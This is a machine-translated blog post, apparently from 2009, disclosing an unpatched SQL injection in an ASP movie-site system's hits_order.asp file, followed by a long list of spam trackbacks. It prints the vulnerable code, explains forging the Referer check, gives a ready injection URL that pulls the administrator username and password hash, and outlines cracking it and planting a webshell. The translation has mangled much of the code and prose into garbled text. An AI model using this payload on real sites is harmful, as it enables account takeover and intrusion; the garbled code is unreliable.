RSS

עין יום מערכת קולנוע 0day

הפוסט הזה נכתב ב 25 אוקטובר 2009

: St0p & My5t3ry
לשכפל, נא לציין את המקור http://www.st0p.org

אה, My5t3ry לבוא עם חור, פנה למנהל הרשמי, כבר לא שמה לב אלי.

ראשית, הרשה לי להזריק את הבעיה

פירצה קובץ / p_inc / hits_order.asp 

 
 2
 3
 4
 5
 6
 7
 8
 9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30

  <- # Include קובץ = ".. / P_inc / config.asp" ->
 <- # Include קובץ = ".. / P_inc / function.asp" ->
 <- # Include קובץ = ".. / P_inc / function_func.asp" ->
 <- # Include קובץ = ".. / P_inc / openconn.asp" ->
 <- # Include קובץ = ".. / P_inc / G_function.asp" ->
 <%
 Then אם לא ChkPost () אחר
	 G_error_page_1 בתגובה. הפניה G_error_page_1
	 ( ) סוף תגובה ()
 אנד אם
 "התקשר ChkPost / p_inc / function.asp הקובץ () function כדי לזהות כתובת אתר המקור
 url,numb ) פונקציה G_hitss (URL, קהה)
	 Dim str
	 str = ""
	 & numb & " id,m_name,m_pic,m_hits,m_content from qingtiandy_movie where m_look=1 order by m_hits desc,id desc" SQL = "למעלה בחר" & תחושה & "id, m_name, m_pic, m_hits, m_content מ qingtiandy_movie שם m_look = 1 סדר לפי m_hits יורד, id desc"
             "ראיתי את זה לא תחושה, לא לסנן
	 server . CreateObject ( G_RS ) סט RS = שרת. CreateObject (G_RS)
	 , 1 RS. פתוח SQL, conn, 1, 1
	 i = 1
	 האם אמנם לא RS. EOF 
		 Array ( "d" ,rs ( 0 ) ,url ) ) d_url = url_ (Array ("d", RS (0), כתובת האתר))
		 "<div class=kkk1_list><a class=bbb href=" & d_url & " title='主演:" & rs ( 2 ) & "'>" & Get_length ( rs ( 1 ) , "" , 32 ) & "</a> (" & rs ( 3 ) & ")</div>" str = str & "class=kkk1_list> <div <a class=bbb href=" & d_url &" title='主演:" & RS (2) & "'>" & Get_length (RS (1), "", 32) & "</ a> (" & rs (3) & ") </ p>
		 i = i + 1
		 RS. movenext
	 לולאה
	 G_hitss str =
 סוף פונקציה
 %>
 G_hitss ( request ( "url" ) , request ( "numb" ) ) %> ") document.write ("<% = G_hitss (בקשה (" כתובת "), בקשה (" רדום "))%>")
 "כאן תחושה המסנן

שימוש בשיטות כמו
1, אתה יכול להשתמש ישירות Referer תוכנה מזויפת, בקר בכתובת הבאה כדי להשיג
דרך XMLHTTP מזויפים Referer, בקר יישום הכתובת הבאה
3, על ידי JS JavaScript כדי לשלוט על כתובת המקור 

 

  ( "<a href='/p_inc/hits_order.asp?numb=1 (select str_username from tbl_admin) as username,(select str_pass from tbl_admin) as pass,'>科幻片</a> " ) ; javascript:. המסמך לכתוב (<a href='/p_inc/hits_order.asp?numb=1 (select str_username מ tbl_admin) כמו username,(select str_pass מ tbl_admin) כמו מדע בדיוני pass,'> </ a> ") ;

http://www.st0p.org/p_inc/hits_order.asp?numb=1 (str_username בחר מתוך tbl_admin) כמו שם משתמש, (str_pass בחר מתוך tbl_admin) ככל שחולפות,

הערה: לקפוץ מעל Referer איתור יכולה להיות דרך POST, GET, קוקי של מגוון רחב של דרכים כדי להשיג מוזרק. . .

הגישה הבאה, שם משתמש מנהל ב-URL של הקישור, Hash הסיסמה מוצג ישירות החוצה. .

לפצח את הסיסמה כי Hash ברקע ניתן ישירות לערוך את קובץ ה-ASP, לתוך הרקע ולקחת קו SHELL.

הליך זה, יש פרצות אחרות. כאן לא נעשה. .

, , ,
למד מעלות בגידות אומנויות לחימה
Chinese (Simplified) flagItalian flagKorean flagChinese (Traditional) flagPortuguese flagEnglish flagGerman flagFrench flagSpanish flagJapanese flagArabic flagRussian flagGreek flagDutch flagBulgarian flagCzech flagCroatian flagDanish flagFinnish flagHindi flagPolish flagRomanian flagSwedish flagNorwegian flagCatalan flagFilipino flagHebrew flagIndonesian flagLatvian flagLithuanian flagSerbian flagSlovak flagSlovenian flagUkrainian flagVietnamese flagAlbanian flagEstonian flagGalician flagMaltese flagThai flagTurkish flagHungarian flag

  1. 174 Trackback (ים)

  2. 30 אוקטובר 2009: הבלוג של עין ימים מערכת קולנוע 0day _AT_ של Molutran
  3. 6 נובמבר 2011: Hewlett התקנת דלת ניו יורק
  4. 8 נובמבר 2011: מקום מצחיק
  5. 9 נובמבר 2011: מאמרים ביתיים
  6. 10 נובמבר 2011: Rehab דמרול
  7. 11 נובמבר 2011: קירוי ההסמכה זכה ב Harveysburg של OH
  8. 23 נובמבר 2011: הקזינו לשחק משחקים
  9. 24 נובמבר 2011: פיי רייגן
  10. 28 נובמבר 2011: גנדר בקוד הר פרומו
  11. 29 נובמבר 2011: מחלה תביעה העבודה
  12. 9 דצמבר 2011: תוכניות הבית
  13. 11 דצמבר 2011: מים ionizer ביקורת
  14. 12 דצמבר 2011: משחקי יריות
  15. 12 דצמבר 2011: regtool
  16. 12 דצמבר 2011: אמנויות לחימה
  17. 13 דצמבר 2011: אנגינה
  18. 14 דצמבר 2011: רכבי השטח משומשים למכירה
  19. 14 דצמבר 2011: הנייד
  20. 14 דצמבר 2011: את Grondverzetters משומשים למכירה
  21. 16 דצמבר 2011: מיידית סרט במדיה
  22. 17 דצמבר 2011: איך נתבים
  23. 18 דצמבר 2011: של פוקימון MMORPGs
  24. 19 דצמבר 2011: ליברטי ריזרב ההשקעה
  25. 20 דצמבר 2011: אור iPhone, לוגו למעלה
  26. 20 דצמבר 2011: loanin המשכורת
  27. 23 דצמבר 2011: klick הייר
  28. 23 דצמבר, 2011: , חלקי הספק
  29. 24 דצמבר 2011: הגרלה מיליוני אירו
  30. 26 דצמבר 2011: מדריך עסקים בלונדון
  31. 27 דצמבר 2011: http://walkfit.webstarts.com
  32. 28 דצמבר 2011: http://www.pkv-wechsel.eu/
  33. 31 דצמבר 2011: reconquistar
  34. 31 דצמבר 2011: datingsites vergelijken
  35. 1 ינואר 2012: משחקים ברשת בחינם
  36. 2 ינואר 2012: טבע, השראה,
  37. 2 ינואר 2012: קידום אתרים אורגני
  38. 4 ינואר, 2012: לבנות את קישורים נכנסים
  39. 4 ינואר, 2012: reconquistar
  40. 5 ינואר 2012: קורות חיים מקצועיים
  41. 5 ינואר 2012: סנטורום
  42. 5 ינואר 2012: פציעות תאונות דרכים
  43. 6 ינואר 2012: ביגוד יוגה
  44. 6 ינואר, 2012: כמו קופונים להדפסה הנעלה מפורסמים
  45. 6 ינואר 2012: להפוך את בית ב
  46. 6 ינואר 2012: הזמר וכותב השירים
  47. 6 ינואר 2012: הפקת וידאו ניו ברונסוויק ניו ג 'רזי
  48. 6 ינואר 2012: annualcreditreport.com
  49. 7 ינואר 2012: אסם שמלה
  50. 7 ינואר 2012: קוד אישי בעבודת יד
  51. 7 ינואר 2012: דף הבית
  52. 8 ינואר 2012: Invisalign la
  53. 8 ינואר 2012: בעלי חיים פאק, סקירה,
  54. 9 ינואר 2012: סנטה מוניקה קרטין טיפול
  55. 9 ינואר 2012: הגוף bildar
  56. 10 ינואר 2012: סחיטת כספים
  57. 10 ינואר 2012: חינם אתרי הסקר ששולמו
  58. 10 ינואר 2012: socks5 שירות
  59. 11 ינואר 2012: מרכזי טיפול התמכרות
  60. 11 ינואר 2012: מזג האוויר התראות חירום עזרה
  61. 12 ינואר 2012: השקעה בזהב
  62. 13 ינואר 2012: תועה פודל התקשורת קופירייטינג
  63. 13 ינואר 2012: הקלטות הפולחן
  64. 13 ינואר 2012: תרופות עבור צרבת
  65. 13 ינואר 2012: מכונות קפה
  66. 14 ינואר 2012: Fairmount קירוי שטוח של OH
  67. 14 ינואר 2012: iPad 3
  68. 16 ינואר 2012: אהבה ניקול שרזינגר Feat donnely
  69. 17 ינואר 2012: deportivos suplementos
  70. 18 ינואר 2012: לוטוס טארוט
  71. 20 ינואר 2012: Whatman, אצבעוני מיצוי
  72. 20 ינואר 2012: שדה הקרב להורדה
  73. 21 ינואר 2012: portarollo
  74. 24 ינואר 2012: רובוט ענק מנוע SEO
  75. 24 ינואר 2012: antykwariat באינטרנט
  76. 25 ינואר 2012: זמר נשמה
  77. 27 ינואר 2012: סינוס שתל דנטלי במעלית לוס אנג'לס
  78. 27 ינואר 2012: סיאטל SEO
  79. 27 ינואר 2012: תכשיטים עבודת יד
  80. 28 ינואר 2012: קרטין
  81. 29 ינואר 2012: אחריות אלפא
  82. 30 ינואר 2012: הכשרה
  83. 30 ינואר 2012: igun Pro
  84. 1 פבואר 2012: אני אוהב יוגה,
  85. 1 פבואר 2012: מודל קוסמטיקה
  86. 2 פבואר 2012: סוכנות דוגמנות
  87. 3 פבואר 2012: השכרת טוקסידו
  88. 4 פבואר 2012: קידום אתרים אורגני
  89. 4 פבואר 2012: דייגו סן תאונות רכב עורך דין
  90. 5 פבואר 2012: פיצוי צליפת שוט
  91. 5 פבואר 2012: מיכל TOPS
  92. 6 פבואר 2012: תביעות רשלנות רפואית
  93. 6 פבואר 2012: פגיעות בעבודה
  94. 6 פבואר 2012: תביעות רשלנות רפואית
  95. 7 פברואר, 2012: עוקבים בטוויטר
  96. 10 פבואר 2012: סירות mclay
  97. 10 פבואר 2012: ניקוז ניקוי פנימה נהר התיכון MD
  98. 13 פבואר 2012: וורלוק PVP מדריך,
  99. 13 פבואר 2012: הטמפרטורה לוגר
  100. 15 פבואר 2012: łuszczyca
  101. 16 פבואר 2012: בתי הבראה פנימה אוקלנד
  102. 17 פבואר 2012: זיכיונות עבור NZ למכירה
  103. 18 פבואר 2012: קנה מד מינון
  104. 18 פבואר 2012: קופון שמן זול שינוי
  105. 18 פבואר 2012: SAITEK הפרו לחימה טיסה דוושות ההגה
  106. 18 פבואר 2012: Tela
  107. 19 פבואר 2012: פני מניות למעלה
  108. 20 פבואר 2012: TX ביטוח
  109. 21 פבואר 2012: גטסבי הגדול שעווה
  110. 21 פבואר 2012: השכרת ציוד אוקלנד
  111. 21 פבואר 2012: לעשות כסף למכור את המוסיקה שלך
  112. 22 פבואר 2012: עסקאות יומי
  113. 22 פבואר 2012: סירות NZ
  114. 22 פבואר 2012: מתנות סבתא
  115. 23 פבואר 2012: מעילי עור Mens
  116. 23 לפברואר, 2012: מזרנים הכי טובים
  117. 23 פבואר 2012: זיגוג כפול מחודשות
  118. 23 פבואר 2012: עלה טבעות זהב אירוסין
  119. 24 פבואר 2012: כסף, ממיסים ערך
  120. 26 פבואר 2012: הכלב snuggie
  121. 27 פבואר 2012: ניו יורק נדל"ן בתכנון עו"ד
  122. 27 פבואר 2012: , מדריך פלדין
  123. 1 מרס 2012: senuke x ביקורת
  124. 1 מרס 2012: העולם החניכים
  125. 3 מרס 2012: מדיומים
  126. 5 מרס 2012: Aboubacar
  127. 7 מרס 2012: לינדר אומנויות לחימה
  128. 8 מרס 2012: ביטוח NZ
  129. 8 מרס 2012: חנויות טיולים
  130. 9 מרס 2012: benchtops אוקלנד
  131. 10 מרס 2012: Scuba
  132. 10 מרס 2012: מאוריציוס
  133. 10 מרס 2012: להעלות קטעי וידאו ל
  134. 11 מרס 2012: Directtoys.de
  135. 12 מרס 2012: קריאה נפשיים
  136. 13 מרס 2012: מכונית מירוץ נהיגה ניסיון
  137. 16 מרס 2012: ידנית קפיצה
  138. 17 מרס 2012: חינם צ 'אט נפשי
  139. 17 מרס 2012: reklamy סופוט
  140. 18 מרס 2012: משחקים בחינם
  141. 19 מרס 2012: Anissa
  142. 21 מרס 2012: דגים מקוון חנות
  143. 22 מרס 2012: עסקאות יומי
  144. 23 מרס 2012: צבעים סוסים
  145. 24 מרס 2012: משאבות דייבי
  146. 25 מרס 2012: אופני משחקים
  147. 28 מרס 2012: לשטוף פנים לעור שמן
  148. 30 מרס 2012: tatuaggi
  149. 5 אפריל, 2012: דינר
  150. 6 אפריל 2012: זוהר הסוד שלי
  151. 6 אפריל 2012: Gratio
  152. 7 אפריל 2012: זולי
  153. 7 אפריל 2012: hunterpvp
  154. 7 אפריל 2012: Mage PvP
  155. 7 אפריל 2012: שבועיים, מבצעים
  156. 9 אפריל 2012: antykwariat poleca
  157. 10 אפריל 2012: ארס, חינם
  158. 10 אפריל 2012: gardeningrecipe
  159. 10 אפריל 2012: toprczone
  160. 15 אפריל 2012: เพลง ใหม่ ภ
  161. 18 אפריל 2012: מכניקת אוקלנד
  162. 18 אפריל 2012: תריסים עץ
  163. 18 אפריל 2012: זה מאמר מאמר זה היה
  164. 19 אפריל 2012: סולו Hd
  165. 20 אפריל 2012: לראות את זה
  166. 20 אפריל 2012: Windows אוקלנד
  167. 21 אפריל 2012: קריאה נפשיים באינטרנט
  168. 22 אפריל 2012: למעלה שירותי קידום אתרים
  169. 22 אפריל 2012: בידוד דינמי
  170. 22 אפריל 2012: סיור Segway
  171. 22 אפריל 2012: קורס ניהול שרשרת אספקה,
  172. 22 אפריל 2012: קידום אתרים של גלזגו
  173. 3 מאי 2012: מה לעשות כדי למכור - זהב
  174. 11 מאי 2012: תוספת קטון פטל
  175. 13 מאי 2012: accouterment arghool apophyllite

עליך להיות מחובר בכדי לפרסם תגובה.